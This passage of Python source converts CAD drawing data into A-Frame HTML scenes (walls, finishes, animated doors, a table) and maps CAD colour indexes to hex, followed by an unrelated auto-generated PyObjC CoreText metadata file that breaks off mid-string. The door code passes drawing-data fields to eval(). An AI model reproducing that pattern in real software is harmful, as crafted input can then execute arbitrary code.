self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},-,{part_image},-,-,-,-,-,-,-,{self.d["width"]},{self.d["height"]},-,-,- \n') except: part_image = self.d['8'] part_repeat = self.d['repeat'] part_color = self.d['color'] outstr = f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {self.d["height"]/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{self.d["height"]}"\n' outstr += f'material="src: #image-{part_image}; color: {part_color}' outstr += is_repeat(part_repeat, self.d['width'], self.d['height']) outstr += '">\n</a-plane>\n' return outstr def part_striped_finishing(self): if self.d['sub_side']=='in-top' or self.d['sub_side']=='out-top': door_height = fabs(self.d['door_height'])*self.d['43']/fabs(self.d['43']) else: door_height = 0 try: finishing = self.finishings.get(title = self.d[self.d['side']]) wall_height = fabs(self.d['height']) tiling_height = fabs(float(finishing.tiling_height))/100*self.d['43']/fabs(self.d['43']) skirting_height = fabs(float(finishing.skirting_height))/100*self.d['43']/fabs(self.d['43']) if door_height > wall_height: door_height = wall_height tiling_height = wall_height skirting_height = wall_height else: if skirting_height < door_height: skirting_height = door_height if skirting_height > wall_height: skirting_height = wall_height if tiling_height < skirting_height: tiling_height = skirting_height if tiling_height > wall_height: tiling_height = wall_height wall_height = wall_height - tiling_height tiling_height = tiling_height - skirting_height skirting_height = skirting_height - door_height if finishing.image: wall_image = 'finishing-' + finishing.title wall_repeat = finishing.pattern else: wall_image = self.d['8'] wall_repeat = self.d['repeat'] if finishing.color: wall_color = finishing.color else: wall_color = self.d['color'] outstr = '' if wall_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {wall_height/2+tiling_height+skirting_height} 0" \n' outstr += f'width="{self.d["width"]}" height="{wall_height}" \n' outstr += f'material="src: #image-{wall_image}; color: {wall_color}' outstr += is_repeat(wall_repeat, self.d['width'], wall_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Wall,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{wall_height},-,-,- \n') if tiling_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-tiling" \n' outstr += f'position="0 {tiling_height/2+skirting_height} 0" \n' outstr += f'width="{self.d["width"]}" height="{tiling_height}" \n' outstr += f'material="src: #image-tiling-{finishing.title}; color: {finishing.tiling_color}' outstr += is_repeat(finishing.tiling_pattern, self.d['width'], tiling_height) outstr += '">\n</a-plane> \n' self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Tiling,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{tiling_height},-,-,- \n') if skirting_height: outstr += f'<a-plane id="{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}-skirting" \n' outstr += f'position="0 {skirting_height/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{skirting_height}" \n' outstr += f'material="src: #image-skirting-{finishing.title}; color: {finishing.skirting_color}' outstr += is_repeat(finishing.skirting_pattern, self.d['width'], skirting_height) outstr += '">\n</a-plane> \n' 
self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},{self.d["sub_side"]},Skirting,{finishing.title},-,-,-,-,-,-,{self.d["width"]},{skirting_height},-,-,- \n') except: outstr = f'<a-plane id="except-{self.d["2"]}-{self.d["num"]}-{self.d["sub_side"]}" \n' outstr += f'position="0 {(self.d["height"]-door_height)/2} 0" \n' outstr += f'width="{self.d["width"]}" height="{self.d["height"]-door_height}" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], self.d["width"], self.d["height"]-door_height) outstr += f'">\n</a-plane> \n' return outstr def write_html_alert(self): outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}-alert: {self.d["alert"]}" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' if self.d["2"] == 'a-openwall': outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-left" \n' outstr += f'position="{self.d["door_off_1"]/2} {self.d["door_height"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["door_off_1"])} {fabs(self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-right" \n' outstr += f'position="{(self.d["41"]-self.d["door_off_2"])/2+self.d["door_off_2"]} {self.d["door_height"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"]-self.d["door_off_2"])} {fabs(self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert-top" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"] - self.d["door_height"])/2+self.d["door_height"]} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])} {fabs(self.d["43"] - self.d["door_height"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' else: outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-alert" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])} {fabs(self.d["43"])} {fabs(self.d["42"])}" \n' outstr += 'material="color: red;">\n' outstr += '</a-box>\n' outstr += '</a-entity>\n' return outstr class AOpening(object):#face it, this could be a APartition subclass def __init__(self, page_obj, data, types, finishings, csv_f): self.d = data#is it possible to use the self.__dict__=data construct? 
it would be much cleaner self.page_obj = page_obj.specific self.d['alert'] = 'None'#sets alert default self.d['frame_image'] = ''#sets frame defaults self.d['frame_pattern'] = '' self.d['frame_color'] = self.d['color'] self.type_obj = False if self.d['type']:#looks for partition type try: self.type_obj = types.get(title = self.d['type']) except: pass self.finish_obj = False if self.d['finishing']:#looks for finishing try: self.finish_obj = finishings.get(title = self.d['finishing']) except: pass self.csv_f = csv_f def has_finishing(self): #we change appearance according to finishing if self.finish_obj.tiling_image: self.d['8'] = 'tiling-' + self.finish_obj.title self.d['repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['frame_image'] = 'skirting-' + self.finish_obj.title self.d['frame_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['frame_color'] = self.finish_obj.skirting_color return def has_type(self): #we don't calculate door weight, but we change appearance accordingly to partition type if self.type_obj.image: self.d['8'] = 'partition-' + self.type_obj.title self.d['repeat'] = self.type_obj.pattern if self.type_obj.color: self.d['color'] = self.type_obj.color #writing to csv file opening_weight = 0#by now useless self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,{self.type_obj.title},{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},{opening_weight},{self.d["alert"]} \n') return def no_type(self): #writing to csv file self.csv_f.write(f'{self.d["num"]},{self.d["layer"]},{self.d["2"]},-,-,None,{self.d["10"]},{-self.d["20"]},{self.d["30"]},') self.csv_f.write(f'{self.d["210"]},{-self.d["220"]},{self.d["50"]},{self.d["41"]},{self.d["42"]},{self.d["43"]},0,{self.d["alert"]} \n') return def write_html(self): #start entity outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n' if self.page_obj.shadows: outstr += 'shadow="receive: true; cast: true" \n' outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n' outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n' #left frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-left-frame" \n' outstr += f'position="{-0.049*unit(self.d["41"])} {(self.d["43"]+0.099*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d["43"])+0.099} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += '</a-box>\n' #right frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-right-frame" \n' outstr += f'position="{self.d["41"]+0.049*unit(self.d["41"])} {(self.d["43"]+0.099*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += 'rotation="0 0 90" \n' outstr += f'scale="{fabs(self.d["43"])+0.099} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += '</a-box>\n' #top frame outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-top-frame" \n' outstr += f'position="{self.d["41"]/2} {self.d["43"]+0.049*unit(self.d["43"])} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} 0.1 {fabs(self.d["42"])+0.02}" \n' outstr += f'material="src: #image-{self.d["frame_image"]}; color: {self.d["frame_color"]}">' outstr += 
'</a-box>\n' if self.d["type"] == 'ghost': outstr += '</a-entity>\n' return outstr else: if eval(self.d["sliding"]): if eval(self.d["double"]): #animated slide 1 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide-1"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-(self.d["41"])/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-1" \n' outstr += f'position="{self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated slide 2 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide-2" \n' outstr += f'position="{self.d["41"]} 0 0"> \n' outstr += f'<a-animation attribute="position" from="{self.d["41"]} 0 0" to="{(self.d["41"])*3/2} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-2" \n' outstr += f'position="{-self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#single #animated slide outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-slide"> \n' outstr += f'<a-animation attribute="position" from="0 0 0" to="{-self.d["41"]} 0 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-self.d["42"]/2}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#hinged if eval(self.d["double"]): #animated hinge 1 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge-1"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 1 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-1" \n' outstr += f'position="{self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #animated hinge 2 outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge-2" ' outstr += 
f'position="{self.d["41"]} 0 0"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part 2 outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part-2" \n' outstr += f'position="{-self.d["41"]/4} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{(fabs(self.d["41"]))/2-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], (fabs(self.d["41"]))/2-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr else:#single #animated hinge outstr += f'<a-entity id="{self.d["2"]}-{self.d["num"]}-hinge"> \n' outstr += f'<a-animation attribute="rotation" from="0 0 0" to="0 {-90*unit(self.d["41"])*unit(self.d["42"])} 0" begin="click" repeat="1" direction="alternate"></a-animation>' #moving part outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-moving-part" \n' outstr += f'position="{self.d["41"]/2} {(self.d["43"]-0.001*unit(self.d["43"]))/2} {-0.025*unit(self.d["42"])}" \n' outstr += f'scale="{fabs(self.d["41"])-0.002} {self.d["43"]-0.001*unit(self.d["43"])} 0.05" \n' outstr += f'material="src: #image-{self.d["8"]}; color: {self.d["color"]}' outstr += is_repeat(self.d["repeat"], fabs(self.d["41"])-0.002, self.d["43"]-0.001*unit(self.d["43"])) outstr += '"></a-box>\n' outstr += '</a-entity>\n' #end entity outstr += '</a-entity>\n' return outstr class AFurniture(object): def __init__(self, page_obj, data, finishings): self.d = data#is it possible to use the self.__dict__=data construct? it would be much cleaner self.page_obj = page_obj.specific #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] #looks for finishing self.finish_obj = False if self.d['FINISHING']: try: self.finish_obj = finishings.get(title = self.d['FINISHING']) except: pass def has_finishing(self): #we change appearance according to finishing if self.finish_obj.image: self.d['8'] = self.finish_obj.title self.d['repeat'] = self.finish_obj.pattern if self.finish_obj.color: self.d['color'] = self.finish_obj.color if self.finish_obj.tiling_image: self.d['tiling_image'] = 'tiling-' + self.finish_obj.title self.d['tiling_repeat'] = self.finish_obj.tiling_pattern if self.finish_obj.tiling_color: self.d['tiling_color'] = self.finish_obj.tiling_color if self.finish_obj.skirting_image: self.d['skirting_image'] = 'skirting-' + self.finish_obj.title self.d['skirting_repeat'] = self.finish_obj.skirting_pattern if self.finish_obj.skirting_color: self.d['skirting_color'] = self.finish_obj.skirting_color return def no_finishing(self): #dummy values self.d['tiling_image'] = self.d['8'] self.d['tiling_repeat'] = self.d['repeat'] self.d['tiling_color'] = self.d['color'] self.d['skirting_image'] = self.d['8'] self.d['skirting_repeat'] = self.d['repeat'] self.d['skirting_color'] = self.d['color'] return def write_html(self): if self.d['type'] == 't01': output = self.make_table_01() #elif of other furniture else:#in the end it draws a table! 
            output = self.make_table_01()
        return output

    def make_table_01(self):
        #start entity
        outstr = f'<a-entity id="{self.d["2"]}-{self.d["num"]}" \n'
        if self.page_obj.shadows:
            outstr += 'shadow="receive: true; cast: true" \n'
        outstr += f'position="{self.d["10"]} {self.d["30"]} {self.d["20"]}" \n'
        outstr += f'rotation="{self.d["210"]} {self.d["50"]} {self.d["220"]}">\n'
        #table top
        outstr += f'<a-box id="{self.d["2"]}-{self.d["num"]}-table-top" \n'
        outstr += f'position="{self.d["41"]/2} {self.d["43"]-0.025*unit(self.d["43"])} {-self.d["42"]/2}" \n'
        outstr += f'scale="{fabs(self.d["41"])} 0.05 {fabs(self.d["42"])}" \n'
        outstr += f'material="src: #image-{self.d["tiling_image"]}; color: {self.d["tiling_color"]} '
        outstr += is_repeat(self.d["tiling_repeat"], fabs(self.d["41"]), fabs(self.d["42"]))
        outstr += '"></a-box>\n'
        self.leg = self.d["43"]-0.025*unit(self.d["43"])
        #first leg
        outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-1" \n'
        outstr += f'position="{0.05*unit(self.d["41"])} {self.leg/2} {-0.05*unit(self.d["42"])}" \n'
        outstr += self.close_leg()
        #second leg
        outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-2" \n'
        outstr += f'position="{self.d["41"]-0.05*unit(self.d["41"])} {self.leg/2} {-0.05*unit(self.d["42"])}" \n'
        outstr += self.close_leg()
        #third leg
        outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-3" \n'
        outstr += f'position="{0.05*unit(self.d["41"])} {self.leg/2} {-self.d["42"]+0.05*unit(self.d["42"])}" \n'
        outstr += self.close_leg()
        #fourth leg
        outstr += f'<a-cylinder id="{self.d["2"]}-{self.d["num"]}-leg-4" \n'
        outstr += f'position="{self.d["41"]-0.05*unit(self.d["41"])} {self.leg/2} {-self.d["42"]+0.05*unit(self.d["42"])}" \n'
        outstr += self.close_leg()
        #close entity
        outstr += '</a-entity>\n'
        return outstr

    def close_leg(self):
        outstr = 'radius="0.025" \n'
        outstr += f'height="{self.leg}" \n'
        outstr += f'material="src: #image-{self.d["skirting_image"]}; color: {self.d["skirting_color"]} '
        outstr += '"></a-cylinder>\n'
        return outstr


def cad2hex(cad_color):
    cad_color = abs(int(cad_color))
    if cad_color<0 or cad_color>255:
        return 'white'
    else:
        RGB_list = (
            (0, 0, 0), (255, 0, 0), (255, 255, 0), (0, 255, 0), (0, 255, 255), (0, 0, 255), (255, 0, 255), (255, 255, 255), (128, 128, 128), (192, 192, 192),
            (255, 0, 0), (255, 127, 127), (165, 0, 0), (165, 82, 82), (127, 0, 0), (127, 63, 63), (76, 0, 0), (76, 38, 38), (38, 0, 0), (38, 19, 19),
            (255, 63, 0), (255, 159, 127), (165, 41, 0), (165, 103, 82), (127, 31, 0), (127, 79, 63), (76, 19, 0), (76, 47, 38), (38, 9, 0), (38, 23, 19),
            (255, 127, 0), (255, 191, 127), (165, 82, 0), (165, 124, 82), (127, 63, 0), (127, 95, 63), (76, 38, 0), (76, 57, 38), (38, 19, 0), (38, 28, 19),
            (255, 191, 0), (255, 223, 127), (165, 124, 0), (165, 145, 82), (127, 95, 0), (127, 111, 63), (76, 57, 0), (76, 66, 38), (38, 28, 0), (38, 33, 19),
            (255, 255, 0), (255, 255, 127), (165, 165, 0), (165, 165, 82), (127, 127, 0), (127, 127, 63), (76, 76, 0), (76, 76, 38), (38, 38, 0), (38, 38, 19),
            (191, 255, 0), (223, 255, 127), (124, 165, 0), (145, 165, 82), (95, 127, 0), (111, 127, 63), (57, 76, 0), (66, 76, 38), (28, 38, 0), (33, 38, 19),
            (127, 255, 0), (191, 255, 127), (82, 165, 0), (124, 165, 82), (63, 127, 0), (95, 127, 63), (38, 76, 0), (57, 76, 38), (19, 38, 0), (28, 38, 19),
            (63, 255, 0), (159, 255, 127), (41, 165, 0), (103, 165, 82), (31, 127, 0), (79, 127, 63), (19, 76, 0), (47, 76, 38), (9, 38, 0), (23, 38, 19),
            (0, 255, 0), (127, 255, 127), (0, 165, 0), (82, 165, 82), (0, 127, 0), (63, 127, 63), (0, 76, 0), (38, 76, 38), (0, 38, 0), (19, 38, 19),
            (0, 255, 63), (127, 255, 159), (0, 165, 41), (82, 165, 103), (0, 127, 31), (63, 127, 79), (0, 76, 19), (38, 76, 47), (0, 38, 9), (19, 38, 23),
            (0, 255, 127), (127, 255, 191), (0, 165, 82), (82, 165, 124), (0, 127, 63), (63, 127, 95), (0, 76, 38), (38, 76, 57), (0, 38, 19), (19, 38, 28),
            (0, 255, 191), (127, 255, 223), (0, 165, 124), (82, 165, 145), (0, 127, 95), (63, 127, 111), (0, 76, 57), (38, 76, 66), (0, 38, 28), (19, 38, 33),
            (0, 255, 255), (127, 255, 255), (0, 165, 165), (82, 165, 165), (0, 127, 127), (63, 127, 127), (0, 76, 76), (38, 76, 76), (0, 38, 38), (19, 38, 38),
            (0, 191, 255), (127, 223, 255), (0, 124, 165), (82, 145, 165), (0, 95, 127), (63, 111, 127), (0, 57, 76), (38, 66, 76), (0, 28, 38), (19, 33, 38),
            (0, 127, 255), (127, 191, 255), (0, 82, 165), (82, 124, 165), (0, 63, 127), (63, 95, 127), (0, 38, 76), (38, 57, 76), (0, 19, 38), (19, 28, 38),
            (0, 63, 255), (127, 159, 255), (0, 41, 165), (82, 103, 165), (0, 31, 127), (63, 79, 127), (0, 19, 76), (38, 47, 76), (0, 9, 38), (19, 23, 38),
            (0, 0, 255), (127, 127, 255), (0, 0, 165), (82, 82, 165), (0, 0, 127), (63, 63, 127), (0, 0, 76), (38, 38, 76), (0, 0, 38), (19, 19, 38),
            (63, 0, 255), (159, 127, 255), (41, 0, 165), (103, 82, 165), (31, 0, 127), (79, 63, 127), (19, 0, 76), (47, 38, 76), (9, 0, 38), (23, 19, 38),
            (127, 0, 255), (191, 127, 255), (82, 0, 165), (124, 82, 165), (63, 0, 127), (95, 63, 127), (38, 0, 76), (57, 38, 76), (19, 0, 38), (28, 19, 38),
            (191, 0, 255), (223, 127, 255), (124, 0, 165), (145, 82, 165), (95, 0, 127), (111, 63, 127), (57, 0, 76), (66, 38, 76), (28, 0, 38), (33, 19, 38),
            (255, 0, 255), (255, 127, 255), (165, 0, 165), (165, 82, 165), (127, 0, 127), (127, 63, 127), (76, 0, 76), (76, 38, 76), (38, 0, 38), (38, 19, 38),
            (255, 0, 191), (255, 127, 223), (165, 0, 124), (165, 82, 145), (127, 0, 95), (127, 63, 111), (76, 0, 57), (76, 38, 66), (38, 0, 28), (38, 19, 33),
            (255, 0, 127), (255, 127, 191), (165, 0, 82), (165, 82, 124), (127, 0, 63), (127, 63, 95), (76, 0, 38), (76, 38, 57), (38, 0, 19), (38, 19, 28),
            (255, 0, 63), (255, 127, 159), (165, 0, 41), (165, 82, 103), (127, 0, 31), (127, 63, 79), (76, 0, 19), (76, 38, 47), (38, 0, 9), (38, 19, 23),
            (0, 0, 0), (51, 51, 51), (102, 102, 102), (153, 153, 153), (204, 204, 204), (255, 255, 255),
        )
        r = RGB_list[cad_color][0]
        g = RGB_list[cad_color][1]
        b = RGB_list[cad_color][2]
        hex = "#{:02x}{:02x}{:02x}".format(r,g,b)
        return hex
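# Illustrative usage sketch: cad2hex maps an AutoCAD Color Index (0-255) onto the
# RGB_list palette above and returns a lowercase hex string, falling back to
# 'white' for out-of-range values. The sample indices below are arbitrary.
if __name__ == '__main__':
    for sample in (1, 5, 251, 300):
        # expected: 1 -> '#ff0000', 5 -> '#0000ff', 251 -> '#333333', 300 -> 'white'
        print(sample, cad2hex(sample))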
# This file is generated by objective.metadata
#
# Last update: Sun Sep 29 13:08:51 2019
import objc, sys

if sys.maxsize > 2 ** 32:
    def sel32or64(a, b):
        return b
else:
    def sel32or64(a, b):
        return a

misc = { }
misc.update({
    'sfntInstance': objc.createStructType('sfntInstance', sel32or64(b'{sfntInstance=ss[1l]}', b'{sfntInstance=ss[1i]}'), ['nameID', 'flags', 'coord']),
    'sfntFontDescriptor': objc.createStructType('sfntFontDescriptor', sel32or64(b'{sfntFontDescriptor=Ll}', b'{sfntFontDescriptor=Ii}'), ['name', 'value']),
    'sfntCMapExtendedSubHeader': objc.createStructType('sfntCMapExtendedSubHeader', sel32or64(b'{sfntCMapExtendedSubHeader=SSLL}', b'{sfntCMapExtendedSubHeader=SSII}'), ['format', 'reserved', 'length', 'language']),
    'sfntVariationAxis': objc.createStructType('sfntVariationAxis', sel32or64(b'{sfntVariationAxis=Llllss}', b'{sfntVariationAxis=Iiiiss}'), ['axisTag', 'minValue', 'defaultValue', 'maxValue', 'flags', 'nameID']),
    'CTParagraphStyleSetting': objc.createStructType('CTParagraphStyleSetting', sel32or64(b'{CTParagraphStyleSetting=IL^v}', b'{CTParagraphStyleSetting=IQ^v}'), ['spec', 'valueSize', 'value']),
    'sfntVariationHeader': objc.createStructType('sfntVariationHeader', sel32or64(b'{sfntVariationHeader=lSSSSSS[1{sfntVariationAxis=Llllss}][1{sfntInstance=ss[1l]}]}', b'{sfntVariationHeader=iSSSSSS[1{sfntVariationAxis=Iiiiss}][1{sfntInstance=ss[1i]}]}'), ['version', 'offsetToData', 'countSizePairs', 'axisCount', 'axisSize', 'instanceCount', 'instanceSize', 'axis', 'instance']),
    'sfntDescriptorHeader': objc.createStructType('sfntDescriptorHeader', sel32or64(b'{sfntDescriptorHeader=ll[1{sfntFontDescriptor=Ll}]}', b'{sfntDescriptorHeader=ii[1{sfntFontDescriptor=Ii}]}'), ['version', 'descriptorCount', 'descriptor']),
    'sfntDirectory': objc.createStructType('sfntDirectory', sel32or64(b'{sfntDirectory=LSSSS[1{sfntDirectoryEntry=LLLL}]}', b'{sfntDirectory=ISSSS[1{sfntDirectoryEntry=IIII}]}'), ['format', 'numOffsets', 'searchRange', 'entrySelector', 'rangeShift', 'table']),
    'sfntFeatureName': objc.createStructType('sfntFeatureName', sel32or64(b'{sfntFeatureName=SSlSs}', b'{sfntFeatureName=SSiSs}'), ['featureType', 'settingCount', 'offsetToSettings', 'featureFlags', 'nameID']),
    'sfntDirectoryEntry': objc.createStructType('sfntDirectoryEntry', sel32or64(b'{sfntDirectoryEntry=LLLL}', b'{sfntDirectoryEntry=IIII}'), ['tableTag', 'checkSum', 'offset', 'length']),
    'sfntCMapEncoding': objc.createStructType('sfntCMapEncoding', sel32or64(b'{sfntCMapEncoding=SSL}', b'{sfntCMapEncoding=SSI}'), ['platformID', 'scriptID', 'offset']),
    'sfntFontFeatureSetting': objc.createStructType('sfntFontFeatureSetting', b'{sfntFontFeatureSetting=Ss}', ['setting', 'nameID']),
    'sfntFontRunFeature': objc.createStructType('sfntFontRunFeature', b'{sfntFontRunFeature=SS}', ['featureType', 'setting']),
    'sfntCMapSubHeader': objc.createStructType('sfntCMapSubHeader', b'{sfntCMapSubHeader=SSS}', ['format', 'length', 'languageID']),
    'sfntNameHeader': objc.createStructType('sfntNameHeader', b'{sfntNameHeader=SSS[1{sfntNameRecord=SSSSSS}]}', ['format', 'count', 'stringOffset', 'rec']),
    'sfntCMapHeader': objc.createStructType('sfntCMapHeader', sel32or64(b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSL}]}', b'{sfntCMapHeader=SS[1{sfntCMapEncoding=SSI}]}'), ['version', 'numTables', 'encoding']),
    'FontVariation': objc.createStructType('FontVariation', sel32or64(b'{FontVariation=Ll}', b'{FontVariation=Ii}'), ['name', 'value']),
    'sfntFeatureHeader': objc.createStructType('sfntFeatureHeader',
sel32or64(b'{sfntFeatureHeader=lSSl[1{sfntFeatureName=SSlSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}', b'{sfntFeatureHeader=iSSi[1{sfntFeatureName=SSiSs}][1{sfntFontFeatureSetting=Ss}][1{sfntFontRunFeature=SS}]}'), ['version', 'featureNameCount', 'featureSetCount', 'reserved', 'names', 'settings', 'runs']), 'sfntNameRecord': objc.createStructType('sfntNameRecord', b'{sfntNameRecord=SSSSSS}', ['platformID', 'scriptID', 'languageID', 'nameID', 'length', 'offset'])}) constants = '''$kCTBackgroundColorAttributeName@^{__CFString=}$kCTBaselineClassAttributeName@^{__CFString=}$kCTBaselineClassHanging@^{__CFString=}$kCTBaselineClassIdeographicCentered@^{__CFString=}$kCTBaselineClassIdeographicHigh@^{__CFString=}$kCTBaselineClassIdeographicLow@^{__CFString=}$kCTBaselineClassMath@^{__CFString=}$kCTBaselineClassRoman@^{__CFString=}$kCTBaselineInfoAttributeName@^{__CFString=}$kCTBaselineOffsetAttributeName@^{__CFString=}$kCTBaselineOriginalFont@^{__CFString=}$kCTBaselineReferenceFont@^{__CFString=}$kCTBaselineReferenceInfoAttributeName@^{__CFString=}$kCTCharacterShapeAttributeName@^{__CFString=}$kCTFontAttributeName@^{__CFString=}$kCTFontBaselineAdjustAttribute@^{__CFString=}$kCTFontCascadeListAttribute@^{__CFString=}$kCTFontCharacterSetAttribute@^{__CFString=}$kCTFontCollectionDisallowAutoActivationOption@^{__CFString=}$kCTFontCollectionIncludeDisabledFontsOption@^{__CFString=}$kCTFontCollectionRemoveDuplicatesOption@^{__CFString=}$kCTFontCopyrightNameKey@^{__CFString=}$kCTFontDescriptionNameKey@^{__CFString=}$kCTFontDescriptorMatchingCurrentAssetSize@^{__CFString=}$